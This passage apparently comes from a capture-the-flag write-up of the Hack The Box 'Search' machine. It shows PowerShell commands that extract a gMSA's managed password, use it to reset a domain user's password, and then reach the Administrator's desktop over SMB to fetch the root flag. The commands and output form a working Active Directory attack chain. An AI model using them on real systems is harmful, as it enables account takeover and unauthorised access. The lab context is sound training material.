PS C:\users> $gMSA = Get-ADServiceAccount -Identity BIR-ADFS-GMSA$ -Properties 'msDS-ManagedPassword'
PS C:\users> $data = $gMSA.'msDS-ManagedPassword'
PS C:\users> $pass = ConvertFrom-ADManagedPasswordBlob $data
PS C:\users> $user = 'BIR-ADFS-GMSA$'
PS C:\users> $creds = New-Object System.Management.Automation.PSCredential $user,$pass.SecureCurrentPassword
PS C:\users> Invoke-Command -ComputerName localhost -Credential $creds -ScriptBlock {net user Tristan.Davies test /domain}
The password does not meet the password policy requirements. Check the minimum password length, password complexity 
and password history requirements.
    + CategoryInfo          : NotSpecified: (The password do...y requirements.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
    + PSComputerName        : localhost

NotSpecified: (:String) [], RemoteException
More help is available by typing NET HELPMSG 2245.
NotSpecified: (:String) [], RemoteException

PS C:\users> Invoke-Command -ComputerName localhost -Credential $creds -ScriptBlock {net user Tristan.Davies test1234 /domain}
The command completed successfully.

PS C:\users>

Lateral Movement

Having changed the password on Tristan.Davies, we can now access the account with no issues.

Accessing the system through SMB:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbclient //search.htb/C$ -U 'SEARCH/Tristan.Davies%test1234'
Try "help" to get a list of possible commands.
smb: \> pwd
Current directory is \\search.htb\C$\
smb: \> cd Users\Administrator\
smb: \Users\Administrator\> ls
  .                                  Dc        0  Mon Dec 20 03:34:49 2021
  ..                                 Dc        0  Mon Dec 20 03:34:49 2021
  3D Objects                        DRc        0  Mon Nov 22 15:21:49 2021
  AppData                           DHc        0  Mon Mar 23 03:07:10 2020
  Application Data                DHSrn        0  Mon Mar 23 03:07:10 2020
  Contacts                          DRc        0  Mon Nov 22 15:21:49 2021
  Cookies                         DHSrn        0  Mon Mar 23 03:07:10 2020
  Desktop                           DRc        0  Mon Nov 22 15:21:49 2021
  Documents                         DRc        0  Mon Nov 22 15:21:50 2021
  Downloads                         DRc        0  Mon Nov 22 15:21:49 2021
  Favorites                         DRc        0  Mon Nov 22 15:21:49 2021
  Links                             DRc        0  Mon Nov 22 15:21:50 2021
  Local Settings                  DHSrn        0  Mon Mar 23 03:07:10 2020
  Music                             DRc        0  Mon Nov 22 15:21:49 2021
  My Documents                    DHSrn        0  Mon Mar 23 03:07:10 2020
  NetHood                         DHSrn        0  Mon Mar 23 03:07:10 2020
  NTUSER.DAT                        AHn   262144  Sat Apr 23 00:56:33 2022
  ntuser.dat.LOG1                   AHS     8192  Mon Mar 23 03:07:10 2020
  ntuser.dat.LOG2                   AHS    40960  Mon Mar 23 03:07:10 2020
  NTUSER.DAT{5c711dff-6c97-11ea-81f6-0050568a65c6}.TM.blf    AHS    65536  Mon Mar 23 03:07:11 2020
  NTUSER.DAT{5c711dff-6c97-11ea-81f6-0050568a65c6}.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Mon Mar 23 03:07:10 2020
  NTUSER.DAT{5c711dff-6c97-11ea-81f6-0050568a65c6}.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Mon Mar 23 03:07:10 2020
  ntuser.ini                        HSc       20  Mon Mar 23 03:07:10 2020
  ntuser.pol                      AHSRc      480  Thu Jul 30 09:21:24 2020
  Pictures                          DRc        0  Mon Nov 22 15:21:49 2021
  Recent                          DHSrn        0  Mon Mar 23 03:07:10 2020
  Saved Games                       DRc        0  Mon Nov 22 15:21:50 2021
  Searches                          DRc        0  Mon Nov 22 15:21:49 2021
  SendTo                          DHSrn        0  Mon Mar 23 03:07:10 2020
  Start Menu                      DHSrn        0  Mon Mar 23 03:07:10 2020
  Templates                       DHSrn        0  Mon Mar 23 03:07:10 2020
  Videos                            DRc        0  Mon Nov 22 15:21:49 2021

		3246079 blocks of size 4096. 409296 blocks available
smb: \Users\Administrator\> ls Desktop\
  .                                 DRc        0  Mon Nov 22 15:21:49 2021
  ..                                DRc        0  Mon Nov 22 15:21:49 2021
  desktop.ini                       AHS      282  Mon Nov 22 15:21:49 2021
  root.txt                          ARc       34  Fri Apr 22 09:32:25 2022

		3246079 blocks of size 4096. 411142 blocks available
smb: \Users\Administrator\> cd Desktop\
smb: \Users\Administrator\Desktop\> get root.txt 
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \Users\Administrator\Desktop\> quit
                                                                                   
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ cat root.txt 
77dd4b********************8a5483

AND we got the root flag!!

Kerberoasting

Group Managed Service Account

Hunt for the gMSA secrets

http

://

research.search.htb

staff